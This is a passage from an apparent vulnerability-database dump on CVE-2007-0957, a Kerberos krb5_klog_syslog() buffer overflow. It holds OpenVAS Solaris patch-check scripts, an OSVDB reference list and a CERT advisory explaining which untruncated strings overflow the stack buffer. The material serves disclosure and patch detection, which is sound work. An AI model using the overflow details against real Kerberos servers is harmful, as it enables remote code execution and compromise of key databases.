General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"libkadm5 library on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n libkadm5 library\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855127\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:28:12 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"116175-05\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for libkadm5 library 116175-05\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-116175-05-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of libkadm5 library\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"116175-05\", package:\"SUNWkrbu SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0957"], "description": "Check for the Version of ktutil kdb5_util kadmin kadmin.local kadmind", "modified": "2018-04-06T00:00:00", "published": "2009-06-03T00:00:00", "id": "OPENVAS:1361412562310855025", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855025", "type": "openvas", "title": "Solaris Update for ktutil kdb5_util kadmin kadmin.local kadmind 112925-08", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for ktutil kdb5_util kadmin kadmin.local kadmind 112925-08\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"ktutil kdb5_util kadmin kadmin.local kadmind on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n ktutil kdb5_util kadmin kadmin.local kadmind\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855025\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:19:17 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"112925-08\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for ktutil kdb5_util kadmin kadmin.local kadmind 112925-08\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-112925-08-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of ktutil kdb5_util kadmin kadmin.local kadmind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"112925-08\", package:\"SUNWkrbu SUNWkdcu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0957"], "description": "Check for the Version of kadmind & kdb5_util", "modified": "2017-02-20T00:00:00", "published": "2009-06-03T00:00:00", "id": "OPENVAS:855236", "href": "http://plugins.openvas.org/nasl.php?oid=855236", "type": "openvas", "title": "Solaris Update for kadmind & kdb5_util 116044-04", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for kadmind & kdb5_util 116044-04\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"kadmind & kdb5_util on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n kadmind & kdb5_util\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855236);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:28:12 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"116044-04\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for kadmind & kdb5_util 116044-04\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-116044-04-1\");\n\n script_summary(\"Check for the Version of kadmind & kdb5_util\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"116044-04\", package:\"SUNWkdcu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0957"], "description": "Check for the Version of kpasswd, libgss.so.1 and libkadm5clnt.so.1", "modified": "2018-04-06T00:00:00", "published": "2009-09-23T00:00:00", "id": "OPENVAS:1361412562310855651", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310855651", "type": "openvas", "title": "Solaris Update for kpasswd, libgss.so.1 and libkadm5clnt.so.1 109224-11", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for kpasswd, libgss.so.1 and libkadm5clnt.so.1 109224-11\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"kpasswd, libgss.so.1 and libkadm5clnt.so.1 on solaris_5.8_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n kpasswd, libgss.so.1 and libkadm5clnt.so.1\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.855651\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-23 10:48:35 +0200 (Wed, 23 Sep 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"109224-11\");\n script_cve_id(\"CVE-2007-0957\");\n script_name(\"Solaris Update for kpasswd, libgss.so.1 and libkadm5clnt.so.1 109224-11\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-109224-11-1\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of kpasswd, libgss.so.1 and libkadm5clnt.so.1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.8\", arch:\"i386\", patch:\"109224-11\", package:\"SUNWcstl SUNWcsu SUNWgss SUNWcsl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0957"], "description": "Check for the Version of ktutil kdb5_util kadmin kadmin.local kadmind", "modified": "2017-02-20T00:00:00", "published": "2009-06-03T00:00:00", "id": "OPENVAS:855025", "href": "http://plugins.openvas.org/nasl.php?oid=855025", "type": "openvas", "title": "Solaris Update for ktutil kdb5_util kadmin kadmin.local kadmind 112925-08", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for ktutil kdb5_util kadmin kadmin.local kadmind 112925-08\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"ktutil kdb5_util kadmin kadmin.local kadmind on solaris_5.9_sparc\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n ktutil kdb5_util kadmin kadmin.local kadmind\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855025);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:19:17 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"112925-08\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for ktutil kdb5_util kadmin kadmin.local kadmind 112925-08\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-112925-08-1\");\n\n script_summary(\"Check for the Version of ktutil kdb5_util kadmin kadmin.local kadmind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"112925-08\", package:\"SUNWkrbu SUNWkdcu\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:13:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0957"], "description": "Check for the Version of libkadm5", "modified": "2017-02-20T00:00:00", "published": "2009-06-03T00:00:00", "id": "OPENVAS:855603", "href": "http://plugins.openvas.org/nasl.php?oid=855603", "type": "openvas", "title": "Solaris Update for libkadm5 116046-09", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for libkadm5 116046-09\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"libkadm5 on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n libkadm5\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855603);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:28:12 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"116046-09\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for libkadm5 116046-09\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-116046-09-1\");\n\n script_summary(\"Check for the Version of libkadm5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"116046-09\", package:\"SUNWkdcu SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-0957"], "description": "Check for the Version of libkadm5 library", "modified": "2017-02-20T00:00:00", "published": "2009-06-03T00:00:00", "id": "OPENVAS:855127", "href": "http://plugins.openvas.org/nasl.php?oid=855127", "type": "openvas", "title": "Solaris Update for libkadm5 library 116175-05", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Solaris Update for libkadm5 library 116175-05\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_affected = \"libkadm5 library on solaris_5.9_x86\";\ntag_insight = \"The remote host is missing a patch containing a security fix,\n which affects the following component(s): \n libkadm5 library\n For more information please visit the below reference link.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(855127);\n script_version(\"$Revision: 5359 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 12:20:19 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-03 12:28:12 +0200 (Wed, 03 Jun 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"SUNSolve\", value: \"116175-05\");\n script_cve_id(\"CVE-2007-0957\");\n script_name( \"Solaris Update for libkadm5 library 116175-05\");\n\n script_xref(name : \"URL\" , value : \"http://sunsolve.sun.com/search/document.do?assetkey=1-21-116175-05-1\");\n\n script_summary(\"Check for the Version of libkadm5 library\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Solaris Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/solosversion\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"solaris.inc\");\n\nrelease = get_kb_item(\"ssh/login/solosversion\");\n\nif(release == NULL){\n exit(0);\n}\n\nif(solaris_check_patch(release:\"5.9\", arch:\"i386\", patch:\"116175-05\", package:\"SUNWkrbu SUNWcstl\") < 0)\n{\n security_message(0);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "cvelist": ["CVE-2007-0957"], "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](https://www4.itrc.hp.com/service/cki/docDisplay.do?docId=c01056923)\n[Vendor Specific Advisory URL](http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2007-002-syslog.txt)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=305391)\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/search/document.do?assetkey=1-26-102930-1)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=305445)\nSecurity Tracker: 1017849\n[Secunia Advisory ID:24798](https://secuniaresearch.flexerasoftware.com/advisories/24798/)\n[Secunia Advisory ID:24757](https://secuniaresearch.flexerasoftware.com/advisories/24757/)\n[Secunia Advisory ID:24966](https://secuniaresearch.flexerasoftware.com/advisories/24966/)\n[Secunia Advisory ID:24736](https://secuniaresearch.flexerasoftware.com/advisories/24736/)\n[Secunia Advisory ID:24785](https://secuniaresearch.flexerasoftware.com/advisories/24785/)\n[Secunia Advisory ID:24735](https://secuniaresearch.flexerasoftware.com/advisories/24735/)\n[Secunia Advisory ID:25388](https://secuniaresearch.flexerasoftware.com/advisories/25388/)\n[Secunia Advisory ID:24740](https://secuniaresearch.flexerasoftware.com/advisories/24740/)\n[Secunia Advisory ID:24750](https://secuniaresearch.flexerasoftware.com/advisories/24750/)\n[Secunia Advisory ID:24817](https://secuniaresearch.flexerasoftware.com/advisories/24817/)\n[Secunia Advisory ID:25464](https://secuniaresearch.flexerasoftware.com/advisories/25464/)\n[Secunia Advisory ID:24706](https://secuniaresearch.flexerasoftware.com/advisories/24706/)\n[Secunia Advisory ID:24786](https://secuniaresearch.flexerasoftware.com/advisories/24786/)\n[Secunia Advisory ID:24782](https://secuniaresearch.flexerasoftware.com/advisories/24782/)\nRedHat RHSA: RHSA-2007:0095\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200704-02.xml\nOther Advisory URL: http://frontal2.mandriva.com/security/advisories?name=MDKSA-2007:077\nOther Advisory URL: http://www.debian.org/security/2007/dsa-1276\nOther Advisory URL: http://www.trustix.org/errata/2007/0012/\nOther Advisory URL: http://www.ubuntu.com/usn/usn-449-1\nOther Advisory URL: ftp://patches.sgi.com/support/free/security/advisories/20070401-01-P.asc\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2007-Apr/0001.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0038.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0046.html\nISS X-Force ID: 33411\nFrSIRT Advisory: ADV-2007-1218\nFrSIRT Advisory: ADV-2007-1250\n[CVE-2007-0957](https://vulners.com/cve/CVE-2007-0957)\nCERT VU: 704024\nBugtraq ID: 23285\n", "edition": 1, "modified": "2007-04-03T09:39:28", "published": "2007-04-03T09:39:28", "href": "https://vulners.com/osvdb/OSVDB:34104", "id": "OSVDB:34104", "title": "Kerberos KDC krb5_klog_syslog() Function Remote Overflow", "type": "osvdb", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:42:44", "bulletinFamily": "info", "cvelist": ["CVE-2007-0957"], "description": "### Overview \n\nThe Kerberos administration daemon contains a buffer overflow that may allow a remote, authenticated attacker to execute arbitrary code or cause a denial of service.\n\n### Description \n\nA vulnerability exists in the way the `krb5_klog_syslog()` function used by the Kerberos administration daemon handles specially crafted strings. This vulnerability may cause a buffer overflow that could allow a remote, authenticated user to execute arbitrary code. According to MIT krb5 Security Advisory [MITKRB5-SA-2007-002](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-002-syslog.txt>):\n\n_krb5_klog_syslog() uses vsprintf() to format text into a fixed-length stack buffer. Format specifiers such as \"%s\" used in calls to krb5_klog_syslog() may allow formatting of strings of sufficient length to overwrite memory past the end of the stack buffer__._ \n \n_Certain strings received from the client by the kadmin daemon are not truncated prior to logging. Among these strings is the target principal for the kadmin operation. \n \nThe KDC truncates most client-originated strings prior to logging. One sort of string which is not truncated is a transited-realms string. A malicious KDC sharing a key with the target realm may issue tickets with specially-crafted transited-realms strings to exploit this vulnerability. There are other places where an authenticated user may cause the KDC to log a string which triggers the vulnerability._ \n \nNote that this issue affects all releases of MIT krb5 up to and including krb5-1.6. Other server applications that call the `krb5_klog_syslog()`function provided with MIT krb5 may also be affected. \n \nThis vulnerability can be triggered by sending a specially crafted Kerberos message to a vulnerable system. \n \n--- \n \n### Impact \n\nA remote, authenticated user may be able to execute arbitrary code on an affected system or cause the affected program to crash, resulting in a denial of service. Secondary impacts of code execution include complete compromise of the Kerberos key database. \n \n--- \n \n### Solution \n\n**Apply Patch** \n \n \nA patch can be obtained from MIT krb5 Security Advisory [MITKRB5-SA-2007-002](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-002-syslog.txt>). MIT also states that this will be addressed in the upcoming krb5-1.6.1 release. \n \n--- \n \n### Vendor Information\n\n704024\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Computer, Inc. __ Affected\n\nNotified: April 04, 2007 Updated: April 20, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Apple Security Update [2007-004](<http://docs.info.apple.com/article.html?artnum=305391>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23704024 Feedback>).\n\n### MIT Kerberos Development Team __ Affected\n\nUpdated: April 03, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [MITKRB5-SA-2007-002](<http://web.mit.edu/Kerberos/advisories/MITKRB5-SA-2007-002-syslog.txt>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23704024 Feedback>).\n\n### Mandriva, Inc. __ Affected\n\nNotified: April 04, 2007 Updated: April 05, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to [MDKSA-2007:077](<http://www.mandriva.com/security/advisories?name=MDKSA-2007:077>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23704024 Feedback>).\n\n### Novell, Inc. __ Affected\n\nNotified: April 04, 2007 Updated: April 05, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Novell Security Advisory [3618705](<https://secure-support.novell.com/KanisaPlatform/Publishing/150/3618705_f.SAL_Public.html>).\n\nIf you have feedback, comments, or additional information about this 